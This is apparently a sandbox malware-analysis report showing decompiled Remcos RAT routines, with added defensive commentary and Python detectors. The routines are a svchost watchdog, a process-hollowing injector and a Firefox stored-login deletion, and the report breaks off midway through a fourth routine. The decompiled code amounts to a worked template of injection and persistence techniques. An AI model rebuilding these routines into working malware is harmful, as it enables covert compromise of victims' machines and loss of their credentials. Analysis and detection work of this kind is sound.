                                                                      				_t150 = (_t148 & 0xfffffff8) - 0x7c;
                                                                      				_push(_t142);
                                                                      				_t26 = GetCurrentProcessId();
                                                                      				_t131 = E00401F6B(0x46e5a0);
                                                                      				if(E00410DEB(0x46e5a0, _t27, "WD", _t26) != 0) {
                                                                      					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
                                                                      					__eflags = _t29;
                                                                      					if(_t29 == 0) {
                                                                      						E0040209F(0x46e5a0,  &_v100);
                                                                      						E00401EC4(0x46e588);
                                                                      						E004189A5( &_v100);
                                                                      						E00401F46(0x46e5a0,  &_v124);
                                                                      						__eflags = E004186B9( &_v124);
                                                                      						if(__eflags != 0) {
                                                                      							_t35 = E0040413E(0x46e5a0,  &_v76,  &_v100, _t147, L"\\SysWOW64");
                                                                      							E00401ED3( &_v132, _t37, _t142, E00402F65( &_v36, E0040413E(0x46e5a0,  &_v56,  &_v100, _t147, E00438A0F(0x46e5a0,  &_v76, __eflags, L"WinDir")), _t35));
                                                                      							E00401EC9();
                                                                      							E00401EC9();
                                                                      						} else {
                                                                      							_t61 = E0040413E(0x46e5a0,  &_v28,  &_v100, _t147, L"\\system32");
                                                                      							E00401ED3( &_v132, _t63, _t142, E00402F65( &_v84, E0040413E(0x46e5a0,  &_v56,  &_v100, _t147, E00438A0F(0x46e5a0,  &_v28, __eflags, L"WinDir")), _t61));
                                                                      							E00401EC9();
                                                                      							E00401EC9();
                                                                      						}
                                                                      						E00401EC9();
                                                                      						L00407735(0x46e5a0,  &_v124, 0, _t147, L"\\svchost.exe");
                                                                      						_push(0x46dd44);
                                                                      						_t143 = E00401F6B( &_v104);
                                                                      						_t45 = E00401EC4( &_v128);
                                                                      						_t134 = _t143;
                                                                      						_t46 = E00414EA8(_t45, _t143);
                                                                      						_t151 = _t150 - 0x18;
                                                                      						_t107 = _t150 - 0x18;
                                                                      						__eflags = _t46;
                                                                      						if(_t46 != 0) {
                                                                      							E00402053(0x46e5a0, _t107, _t134, _t147, "Watchdog module activated");
                                                                      							E00402053(0x46e5a0, _t151 - 0x18, _t134, _t147, "i");
                                                                      							E00417D02(0x46e5a0, 0);
                                                                      							Sleep(0x7d0);
                                                                      							_t112 =  *0x46dd4c; // 0x0
                                                                      							goto L13;
                                                                      						}
                                                                      						E00402053(0x46e5a0, _t107, _t134, _t147, "Watchdog launch failed!");
                                                                      						E00402053(0x46e5a0, _t151 - 0x18, _t134, _t147, "E");
                                                                      						E00417D02(0x46e5a0, 0);
                                                                      						CloseHandle( *0x46dd54);
                                                                      						E00401EC9();
                                                                      						E00401F98();
                                                                      						_push(3);
                                                                      						_pop(1);
                                                                      					} else {
                                                                      						CloseHandle(_t29);
                                                                      						_t156 = _t150 - 0x18;
                                                                      						E00402053(0x46e5a0, _t156, _t131, _t147, "Remcos restarted by watchdog!");
                                                                      						_t157 = _t156 - 0x18;
                                                                      						E00402053(0x46e5a0, _t156 - 0x18, _t131, _t147, "i");
                                                                      						E00417D02(0x46e5a0, 0);
                                                                      						E00402053(0x46e5a0, _t157 + 0x18, _t131, _t147, "Watchdog module activated");
                                                                      						E00402053(0x46e5a0, _t157 + 0x18 - 0x18, _t131, _t147, "i");
                                                                      						E00417D02(0x46e5a0, 0);
                                                                      						CreateThread(0, 0, E004102A8, 0, 0, 0);
                                                                      						_t143 = "WDH";
                                                                      						_t78 = E00410AC0(E00401F6B(0x46e5a0), _t143,  &_v148);
                                                                      						__eflags = _t78;
                                                                      						if(_t78 == 0) {
                                                                      							goto L1;
                                                                      						} else {
                                                                      							 *0x46dd44 = OpenProcess(0x1fffff, 0, _v132);
                                                                      							E00410F1D(E00401F6B(0x46e5a0), __eflags, _t143);
                                                                      							_t112 = _v132;
                                                                      							L13:
                                                                      							L14();
                                                                      							asm("int3");
                                                                      							_push(_t143);
                                                                      							_push(0);
                                                                      							_t141 = _t112;
                                                                      							L15:
                                                                      							_t145 = OpenProcess(0x100000, 0, _t141);
                                                                      							WaitForSingleObject(_t145, 0xffffffff);
                                                                      							CloseHandle(_t145);
                                                                      							__eflags =  *0x46dd03;
                                                                      							if(__eflags != 0) {
                                                                      								E0040FC77(__eflags, 0);
                                                                      							}
                                                                      							goto L15;
                                                                      						}
                                                                      						L17:
                                                                      					}
                                                                      				} else {
                                                                      					L1:
                                                                      				}
                                                                      				return 1;
                                                                      				goto L17;
                                                                      			}
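The routine above is the implant's watchdog: it builds the host path from WinDir plus \system32 (or \SysWOW64) and \svchost.exe, hands that path to E00414EA8 to start and hollow the process, logs "Watchdog module activated", and then spins in a loop that opens the parent PID with 0x100000 (SYNCHRONIZE), blocks in WaitForSingleObject until that parent exits, and calls E0040FC77 to restart it while the flag at 0x46dd03 is set. The check below is an added example, not part of this report or of the Remcos code: it flags a svchost.exe started by something other than services.exe with no `-k` service-group argument (CreateProcessW receives only the bare path), and a child of that svchost that re-runs the image of the svchost's own parent. The event records, their field names and the payload.exe name are constructed; that the restart re-launches the parent's own image is an assumption, since the report shows the E0040FC77 call but not its body.

```python
# Constructed process-creation records (not sandbox output); the field names are
# this example's own rather than a particular log schema.
EVENTS = [
    {"pid": 700, "ppid": 600, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"pid": 4200, "ppid": 3100, "image": r"C:\Users\user\AppData\Roaming\payload.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"C:\Users\user\AppData\Roaming\payload.exe"},
    # CreateProcessW(NULL, L"<WinDir>\system32\svchost.exe", ...): bare path, user-land parent
    {"pid": 5100, "ppid": 4200, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Users\user\AppData\Roaming\payload.exe",
     "command_line": r"C:\Windows\system32\svchost.exe"},
    # Assumed restart shape: the watchdog re-runs its parent's image after the parent exits
    {"pid": 6300, "ppid": 5100, "image": r"C:\Users\user\AppData\Roaming\payload.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"C:\Users\user\AppData\Roaming\payload.exe"},
]


def _basename(path):
    """Last path component, lower-cased, so image comparisons ignore directory and case."""
    return path.rsplit("\\", 1)[-1].lower()


def svchost_anomalies(event):
    """Reasons a svchost.exe start looks like a hollowing host rather than a real
    service host; an empty list means nothing unusual."""
    if _basename(event["image"]) != "svchost.exe":
        return []
    reasons = []
    if _basename(event["parent_image"]) != "services.exe":
        reasons.append("parent is not services.exe")
    # Real service hosts are always started as "svchost.exe -k <group> ..."
    if "-k" not in event["command_line"].lower().split():
        reasons.append("no -k service-group argument")
    return reasons


def watchdog_chains(events):
    """(watchdog_pid, restarted_pid) pairs: an anomalous svchost whose own child runs
    the image of the process that spawned the svchost, i.e. a restart by the watchdog."""
    chains = []
    for host in events:
        if not svchost_anomalies(host):
            continue
        for child in events:
            if child["ppid"] == host["pid"] and \
                    child["image"].lower() == host["parent_image"].lower():
                chains.append((host["pid"], child["pid"]))
    return chains


if __name__ == "__main__":
    for ev in EVENTS:
        for reason in svchost_anomalies(ev):
            print("pid %d %s: %s" % (ev["pid"], ev["image"], reason))
    print("watchdog restart chains:", watchdog_chains(EVENTS))
```

Both checks are heuristics: service hosts descend from services.exe and carry `-k <group>`, so a bare svchost.exe path under a user-land parent is exactly the shape this watchdog produces, while the chain check only fires after the parent has died and been respawned.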

                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040FC83
                                                                        • Part of subcall function 00410DEB: RegCreateKeyA.ADVAPI32(80000001,00000000,00461084), ref: 00410DF9
                                                                        • Part of subcall function 00410DEB: RegSetValueExA.ADVAPI32(00461084,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040A7DD,004618C8,00000001,000000AF,00461084), ref: 00410E14
                                                                        • Part of subcall function 00410DEB: RegCloseKey.ADVAPI32(00461084,?,?,?,0040A7DD,004618C8,00000001,000000AF,00461084), ref: 00410E1F
                                                                      • OpenMutexA.KERNEL32 ref: 0040FCBD
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040FCCC
                                                                      • CreateThread.KERNEL32 ref: 0040FD22
                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FEEA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                      • String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64$\svchost.exe$\system32$Cv
                                                                      • API String ID: 3018269243-672988995
                                                                      • Opcode ID: 0bdc7e049419541851ac9c92356915c154aa8d5cc9c3eed3cfb920c1897f8c48
                                                                      • Instruction ID: f5960626a988e2347c46ea91306854afa0d7950ddeed5a23268a862b91c02d91
                                                                      • Opcode Fuzzy Hash: 0bdc7e049419541851ac9c92356915c154aa8d5cc9c3eed3cfb920c1897f8c48
                                                                      • Instruction Fuzzy Hash: 8D51F2316083015BC214BB72DC0B8AF37A49E91719F50053FF502761E2FEBC994A86AF
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00414EA8(WCHAR* __ecx, void* __edx) {
                                                                      				void* __edi;
                                                                      				void* _t47;
                                                                      				void** _t67;
                                                                      				void* _t68;
                                                                      				int _t78;
                                                                      				void* _t88;
                                                                      				void* _t90;
                                                                      				void* _t91;
                                                                      				signed int _t95;
                                                                      				void _t97;
                                                                      				intOrPtr* _t101;
                                                                      				struct _PROCESS_INFORMATION* _t105;
                                                                      				WCHAR* _t106;
                                                                      				CONTEXT* _t108;
                                                                      				void* _t109;
                                                                      				void* _t110;
                                                                      				void* _t111;
                                                                      
                                                                      				_t88 = __edx;
                                                                      				_t106 = __ecx;
                                                                      				 *((intOrPtr*)(_t110 + 0xc)) = 0;
                                                                      				if( *((intOrPtr*)(__edx)) == 0x5a4d) {
                                                                      					_t101 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
                                                                      					if( *_t101 != 0x4550) {
                                                                      						L21:
                                                                      						_t47 = 0;
                                                                      						L22:
                                                                      						return _t47;
                                                                      					}
                                                                      					E004337A0(_t101, _t110 + 0x28, 0, 0x44);
                                                                      					_t105 =  *(_t110 + 0x80);
                                                                      					E004337A0(_t101, _t105, 0, 0x10);
                                                                      					_t111 = _t110 + 0x18;
                                                                      					if(CreateProcessW(0, _t106, 0, 0, 0, 4, 0, 0, _t111 + 0x24, _t105) == 0) {
                                                                      						goto L21;
                                                                      					}
                                                                      					CloseHandle( *(_t111 + 0x5c));
                                                                      					CloseHandle( *(_t111 + 0x60));
                                                                      					CloseHandle( *(_t111 + 0x64));
                                                                      					_t108 = VirtualAlloc(0, 4, 0x1000, 4);
                                                                      					 *(_t111 + 0x24) = _t108;
                                                                      					_t108->ContextFlags = 0x10007;
                                                                      					if(GetThreadContext(_t105->hThread, _t108) == 0 || ReadProcessMemory(_t105->hProcess, _t108->Ebx + 8, _t111 + 0x18, 4, 0) == 0) {
                                                                      						L20:
                                                                      						TerminateProcess(_t105->hProcess, 0);
                                                                      						CloseHandle(_t105->hProcess);
                                                                      						CloseHandle(_t105->hThread);
                                                                      						E004337A0(CloseHandle, _t105, 0, 0x10);
                                                                      						goto L21;
                                                                      					} else {
                                                                      						_t90 =  *(_t111 + 0x10);
                                                                      						_t67 = _t101 + 0x34;
                                                                      						if(_t90 ==  *_t67) {
                                                                      							NtUnmapViewOfSection(_t105->hProcess, _t90);
                                                                      							_t67 = _t101 + 0x34;
                                                                      						}
                                                                      						_t68 = VirtualAllocEx(_t105->hProcess,  *_t67,  *(_t101 + 0x50), 0x3000, 0x40);
                                                                      						 *(_t111 + 0x1c) = _t68;
                                                                      						if(_t68 == 0 || WriteProcessMemory(_t105->hProcess, _t68, _t88,  *(_t101 + 0x54), 0) == 0) {
                                                                      							goto L20;
                                                                      						} else {
                                                                      							 *(_t111 + 0x14) =  *(_t111 + 0x14) & 0x00000000;
                                                                      							if(0 >=  *(_t101 + 6)) {
                                                                      								L14:
                                                                      								_t91 = _t101 + 0x34;
                                                                      								if( *(_t111 + 0x10) ==  *_t91) {
                                                                      									L17:
                                                                      									_t108->Eax =  *((intOrPtr*)(_t101 + 0x28)) +  *(_t111 + 0x1c);
                                                                      									if(SetThreadContext(_t105->hThread, _t108) == 0 || ResumeThread(_t105->hThread) == 0xffffffff) {
                                                                      										goto L20;
                                                                      									} else {
                                                                      										_t47 = 1;
                                                                      										goto L22;
                                                                      									}
                                                                      								}
                                                                      								_t78 = WriteProcessMemory(_t105->hProcess, _t108->Ebx + 8, _t91, 4, 0);
                                                                      								if(_t78 != 0) {
                                                                      									goto L17;
                                                                      								}
                                                                      								TerminateProcess(_t105->hProcess, _t78);
                                                                      								goto L21;
                                                                      							}
                                                                      							_t109 =  *(_t111 + 0x1c);
                                                                      							_t97 = 0;
                                                                      							 *(_t111 + 0x18) = 0;
                                                                      							do {
                                                                      								WriteProcessMemory( *_t105,  *((intOrPtr*)( *((intOrPtr*)(_t88 + 0x3c)) + _t97 + _t88 + 0x104)) + _t109,  *((intOrPtr*)( *((intOrPtr*)(_t88 + 0x3c)) + _t97 + _t88 + 0x10c)) + _t88,  *( *((intOrPtr*)(_t88 + 0x3c)) + _t97 + _t88 + 0x108), 0);
                                                                      								_t95 =  *(_t111 + 0x14) + 1;
                                                                      								_t97 =  *(_t111 + 0x18) + 0x28;
                                                                      								 *(_t111 + 0x14) = _t95;
                                                                      								 *(_t111 + 0x18) = _t97;
                                                                      							} while (_t95 < ( *(_t101 + 6) & 0x0000ffff));
                                                                      							_t108 =  *(_t111 + 0x20);
                                                                      							goto L14;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return 0;
                                                                      			}
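E00414EA8 is the process-hollowing (RunPE) primitive used by the watchdog: CreateProcessW with dwCreationFlags 4 (CREATE_SUSPENDED), GetThreadContext with ContextFlags 0x10007 (CONTEXT_FULL), a 4-byte ReadProcessMemory at Ebx+8 (in a freshly suspended thread Ebx holds the PEB, so this is PEB->ImageBaseAddress), NtUnmapViewOfSection when the host already sits at the payload's preferred ImageBase (+0x34), VirtualAllocEx at that base for SizeOfImage (+0x50) with 0x3000/0x40 (MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE), one WriteProcessMemory for SizeOfHeaders (+0x54) and one per section (NumberOfSections at +6, 0x28-byte headers from e_lfanew+0xF8, reading VirtualAddress, SizeOfRawData and PointerToRawData at +0x104/+0x108/+0x10C), a write of the payload base into PEB->ImageBaseAddress when it differs, then Eax = base + AddressOfEntryPoint (+0x28), SetThreadContext and ResumeThread. The Python below is an added example, not code from this report or from the malware: it resolves the same hard-coded PE32 offsets to list the writes the routine would issue, lays a file out the way the hollowed host ends up holding it, and compares a host's PEB and resume context against its on-disk image to flag the hollow. The minimal PE32 it parses and the host base/size are constructed; the PE32 magic check is added here, the routine itself performs none.

```python
import struct

# Header offsets the injector hard-codes (PE32 layout, relative to e_lfanew).
IMAGE_DOS_SIGNATURE = 0x5A4D          # "MZ"
IMAGE_NT_SIGNATURE = 0x4550           # "PE\0\0"
OFF_NUMBER_OF_SECTIONS = 0x06
OFF_ENTRY_POINT = 0x28
OFF_IMAGE_BASE = 0x34
OFF_SIZE_OF_IMAGE = 0x50
OFF_SIZE_OF_HEADERS = 0x54
PE32_SECTION_TABLE = 0xF8             # 4 (sig) + 20 (file header) + 224 (PE32 optional header)
SECTION_HEADER_SIZE = 0x28            # stride of the decompiled section loop
# Inside a section header: 0x0C VirtualAddress, 0x10 SizeOfRawData, 0x14 PointerToRawData,
# which is why the routine reads e_lfanew + 0x104 / 0x108 / 0x10C for section 0.


def parse_hollowing_plan(image: bytes) -> dict:
    """Resolve the fields the injector uses and list its WriteProcessMemory calls as
    (label, destination RVA, source file offset, byte count)."""
    if struct.unpack_from("<H", image, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if struct.unpack_from("<I", image, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("missing PE signature")
    # Added check: the routine assumes PE32; a PE32+ payload would be mis-parsed by it.
    if struct.unpack_from("<H", image, e_lfanew + 0x18)[0] != 0x10B:
        raise ValueError("not a PE32 image")
    u16 = lambda off: struct.unpack_from("<H", image, e_lfanew + off)[0]
    u32 = lambda off: struct.unpack_from("<I", image, e_lfanew + off)[0]
    plan = {
        "image_base": u32(OFF_IMAGE_BASE),
        "entry_rva": u32(OFF_ENTRY_POINT),
        "size_of_image": u32(OFF_SIZE_OF_IMAGE),
        "writes": [("headers", 0, 0, u32(OFF_SIZE_OF_HEADERS))],
    }
    for i in range(u16(OFF_NUMBER_OF_SECTIONS)):
        sh = e_lfanew + PE32_SECTION_TABLE + i * SECTION_HEADER_SIZE
        name = image[sh:sh + 8].rstrip(b"\0").decode("ascii", "replace")
        virt_addr, raw_size, raw_ptr = struct.unpack_from("<III", image, sh + 0x0C)
        plan["writes"].append((name, virt_addr, raw_ptr, raw_size))
    return plan


def map_image(image: bytes) -> bytearray:
    """Apply the plan to a zeroed SizeOfImage buffer: the layout the hollowed host
    holds once the routine's WriteProcessMemory loop has run."""
    plan = parse_hollowing_plan(image)
    mapped = bytearray(plan["size_of_image"])
    for _label, dst_rva, src_off, size in plan["writes"]:
        chunk = image[src_off:src_off + size]
        mapped[dst_rva:dst_rva + len(chunk)] = chunk
    return mapped


def hollowing_indicators(host_base: int, host_size: int, peb_base: int, resume_eax: int) -> dict:
    """Compare the host's on-disk image with what the routine leaves behind at ResumeThread:
    PEB->ImageBaseAddress rewritten to the payload base and Eax pointing into it."""
    return {
        "peb_base_rewritten": peb_base != host_base,
        "entry_outside_host": not (host_base <= resume_eax < host_base + host_size),
    }


def build_sample_pe32() -> bytes:
    """Constructed sample, not a real binary: a minimal PE32 with .text and .data."""
    e_lfanew, img = 0x40, bytearray(0x600)
    struct.pack_into("<H", img, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    struct.pack_into("<I", img, e_lfanew, IMAGE_NT_SIGNATURE)
    # IMAGE_FILE_HEADER: Machine i386, 2 sections, SizeOfOptionalHeader 0xE0, Characteristics
    struct.pack_into("<HHIIIHH", img, e_lfanew + 4, 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt = e_lfanew + 0x18
    struct.pack_into("<H", img, opt, 0x10B)                   # Magic: PE32
    struct.pack_into("<I", img, opt + 0x10, 0x1010)           # AddressOfEntryPoint
    struct.pack_into("<I", img, opt + 0x1C, 0x400000)         # ImageBase
    struct.pack_into("<II", img, opt + 0x20, 0x1000, 0x200)   # Section / file alignment
    struct.pack_into("<II", img, opt + 0x38, 0x3000, 0x200)   # SizeOfImage, SizeOfHeaders
    sections = [(b".text", 0x1000, 0x200, 0xCC), (b".data", 0x2000, 0x400, 0x41)]
    for i, (name, va, raw_ptr, fill) in enumerate(sections):
        sh = e_lfanew + PE32_SECTION_TABLE + i * SECTION_HEADER_SIZE
        img[sh:sh + len(name)] = name
        # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        struct.pack_into("<IIII", img, sh + 8, 0x200, va, 0x200, raw_ptr)
        img[raw_ptr:raw_ptr + 0x200] = bytes([fill]) * 0x200
    return bytes(img)


if __name__ == "__main__":
    plan = parse_hollowing_plan(build_sample_pe32())
    for w in plan["writes"]:
        print("WriteProcessMemory %-8s rva=%#07x from file+%#05x size=%#x" % w)
    # Host base/size are constructed; after the hollow the PEB holds the payload base
    # and Eax points into it, so both indicators fire.
    print(hollowing_indicators(0x1000000, 0x10000, plan["image_base"],
                               plan["image_base"] + plan["entry_rva"]))
```

The routine reads ImageBaseAddress only to decide whether to call NtUnmapViewOfSection; it always allocates at the payload's preferred base, so a payload that cannot be placed there makes VirtualAllocEx fail and lands in the TerminateProcess path at L20. The indicator pair therefore holds for any payload this injector succeeds with: the PEB no longer points at the host image and the first instruction executed lies outside it.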

                                                                      APIs
                                                                      • CreateProcessW.KERNEL32 ref: 00414F0C
                                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00000000), ref: 00414F24
                                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00000000), ref: 00414F2A
                                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00000000), ref: 00414F30
                                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,?,00000000,00000000), ref: 00414F3D
                                                                      • GetThreadContext.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00414F54
                                                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,00000000), ref: 00414F77
                                                                      • NtUnmapViewOfSection.NTDLL(?,?), ref: 00414F93
                                                                      • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,00000000,00000000), ref: 00414FAA
                                                                      • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 00414FC5
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleProcess$AllocMemoryVirtual$ContextCreateReadSectionThreadUnmapViewWrite
                                                                      • String ID:
                                                                      • API String ID: 2984983542-0
                                                                      • Opcode ID: 0a606e4c10bda653f35c90aec8ad58a165c11598e3c1b7c18cf6d0dd9d803b5e
                                                                      • Instruction ID: 06e4aad082d7c99cc54990fdc0c2b22256374dd00a3d860c03ff13362412e12b
                                                                      • Opcode Fuzzy Hash: 0a606e4c10bda653f35c90aec8ad58a165c11598e3c1b7c18cf6d0dd9d803b5e
                                                                      • Instruction Fuzzy Hash: D551BF70200701EFD7209F65CC45FAABBE9FF8870AF004429FA84DA2A1D775E895CB59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 97%
                                                                      			E0040A1C4(void* __ebx, void* __edx, void* __edi, void* __eflags) {
                                                                      				char _v28;
                                                                      				char _v52;
                                                                      				char _v76;
                                                                      				char _v100;
                                                                      				char _v124;
                                                                      				char _v148;
                                                                      				struct _WIN32_FIND_DATAA _v468;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t41;
                                                                      				signed int _t55;
                                                                      				signed int _t57;
                                                                      				int _t71;
                                                                      				int _t73;
                                                                      				void* _t132;
                                                                      				void* _t133;
                                                                      				void* _t134;
                                                                      				void* _t135;
                                                                      				void* _t136;
                                                                      
                                                                      				_t141 = __eflags;
                                                                      				_t132 = __edi;
                                                                      				_t86 = __ebx;
                                                                      				E0040209F(__ebx,  &_v100);
                                                                      				E0040209F(__ebx,  &_v76);
                                                                      				E0040209F(__ebx,  &_v28);
                                                                      				_t41 = E00402053(_t86,  &_v124, __edx, _t135, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                                                                      				E00401FA2( &_v28, _t42, _t133, E004052D4(_t86,  &_v52, E00438A1A(_t86, __eflags, "UserProfile"), _t135, _t141, _t41));
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				_t128 =  &_v28;
                                                                      				_t134 = FindFirstFileA(E00401F6B(E0040795C( &_v124,  &_v28, _t135, "*")),  &_v468);
                                                                      				E00401F98();
                                                                      				_t142 = _t134 - 0xffffffff;
                                                                      				if(_t134 != 0xffffffff) {
                                                                      					while(1) {
                                                                      						__eflags = FindNextFileA(_t134,  &_v468);
                                                                      						if(__eflags == 0) {
                                                                      							break;
                                                                      						}
                                                                      						__eflags = _v468.dwFileAttributes & 0x00000010;
                                                                      						if((_v468.dwFileAttributes & 0x00000010) != 0) {
                                                                      							_t55 = E00438EB0( &(_v468.cFileName), ".");
                                                                      							__eflags = _t55;
                                                                      							if(_t55 != 0) {
                                                                      								_t57 = E00438EB0( &(_v468.cFileName), "..");
                                                                      								__eflags = _t57;
                                                                      								if(_t57 != 0) {
                                                                      									E00401FA2( &_v100, _t59, _t134, E0040793B(_t86,  &_v52, E0040795C( &_v148,  &_v28, _t135,  &(_v468.cFileName)), _t132, _t135, __eflags, "\\logins.json"));
                                                                      									E00401F98();
                                                                      									E00401F98();
                                                                      									_t128 = E0040795C( &_v52,  &_v28, _t135,  &(_v468.cFileName));
                                                                      									E00401FA2( &_v76, _t65, _t134, E0040793B(_t86,  &_v148, _t65, _t132, _t135, __eflags, "\\key3.db"));
                                                                      									E00401F98();
                                                                      									E00401F98();
                                                                      									_t71 = DeleteFileA(E00401F6B( &_v100));
                                                                      									__eflags = _t71;
                                                                      									if(_t71 == 0) {
                                                                      										GetLastError();
                                                                      									}
                                                                      									_t73 = DeleteFileA(E00401F6B( &_v76));
                                                                      									__eflags = _t73;
                                                                      									if(_t73 == 0) {
                                                                      										GetLastError();
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					E00402053(_t86, _t136 - 0x18, _t128, _t135, "\n[Firefox StoredLogins Cleared!]");
                                                                      					E0040A863(_t86, _t128, _t135, __eflags);
                                                                      					FindClose(_t134);
                                                                      					goto L11;
                                                                      				} else {
                                                                      					FindClose(_t134);
                                                                      					E00402053(_t86, _t136 - 0x18,  &_v28, _t135, "\n[Firefox StoredLogins not found]");
                                                                      					E0040A863(_t86,  &_v28, _t135, _t142);
                                                                      					L11:
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					return 1;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A243
                                                                      • FindClose.KERNEL32(00000000), ref: 0040A25D
                                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0040A380
                                                                      • FindClose.KERNEL32(00000000), ref: 0040A3A6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$CloseFile$FirstNext
                                                                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                      • API String ID: 1164774033-3681987949
                                                                      • Opcode ID: b96d7b6a9e7f65f2659a1d0a2429fabee549dc62b67f20ac5f3d8dc4a256c99a
                                                                      • Instruction ID: e44b73d3c1934ffc166f3e956c94ee971eb84255be0dce4f1a5aaa44fccd639b
                                                                      • Opcode Fuzzy Hash: b96d7b6a9e7f65f2659a1d0a2429fabee549dc62b67f20ac5f3d8dc4a256c99a
                                                                      • Instruction Fuzzy Hash: E751903190421A9ADB14F7B1DC5ADEEB734AF11309F40047FF406B60E2EF385A86CA5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E0040A3CB(void* __edx, void* __edi, void* __eflags) {
                                                                      				char _v28;
                                                                      				char _v52;
                                                                      				char _v76;
                                                                      				char _v100;
                                                                      				char _v124;
                                                                      				struct _WIN32_FIND_DATAA _v444;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t30;
                                                                      				signed int _t44;
                                                                      				signed int _t46;
                                                                      				long _t60;
                                                                      				void* _t68;
                                                                      				void* _t69;
                                                                      				void* _t98;
                                                                      				void* _t103;
                                                                      				void* _t104;
                                                                      				void* _t105;
                                                                      				void* _t106;
                                                                      				void* _t107;
                                                                      
                                                                      				_t112 = __eflags;
                                                                      				_t103 = __edi;
                                                                      				E0040209F(_t68,  &_v52);
                                                                      				E0040209F(_t68,  &_v28);
                                                                      				_t30 = E00402053(_t68,  &_v100, __edx, _t106, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                                                                      				E00401FA2( &_v28, _t31, _t104, E004052D4(_t68,  &_v76, E00438A1A(_t68, __eflags, "UserProfile"), _t106, _t112, _t30));
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				_t101 =  &_v28;
                                                                      				_t105 = FindFirstFileA(E00401F6B(E0040795C( &_v100,  &_v28, _t106, "*")),  &_v444);
                                                                      				E00401F98();
                                                                      				_t113 = _t105 - 0xffffffff;
                                                                      				if(_t105 != 0xffffffff) {
                                                                      					while(1) {
                                                                      						__eflags = FindNextFileA(_t105,  &_v444);
                                                                      						if(__eflags == 0) {
                                                                      							break;
                                                                      						}
                                                                      						__eflags = _v444.dwFileAttributes & 0x00000010;
                                                                      						if((_v444.dwFileAttributes & 0x00000010) == 0) {
                                                                      							continue;
                                                                      						} else {
                                                                      							_t44 = E00438EB0( &(_v444.cFileName), ".");
                                                                      							__eflags = _t44;
                                                                      							if(_t44 == 0) {
                                                                      								continue;
                                                                      							} else {
                                                                      								_t46 = E00438EB0( &(_v444.cFileName), "..");
                                                                      								__eflags = _t46;
                                                                      								if(_t46 == 0) {
                                                                      									continue;
                                                                      								} else {
                                                                      									_t101 = E0040795C( &_v124,  &_v28, _t106,  &(_v444.cFileName));
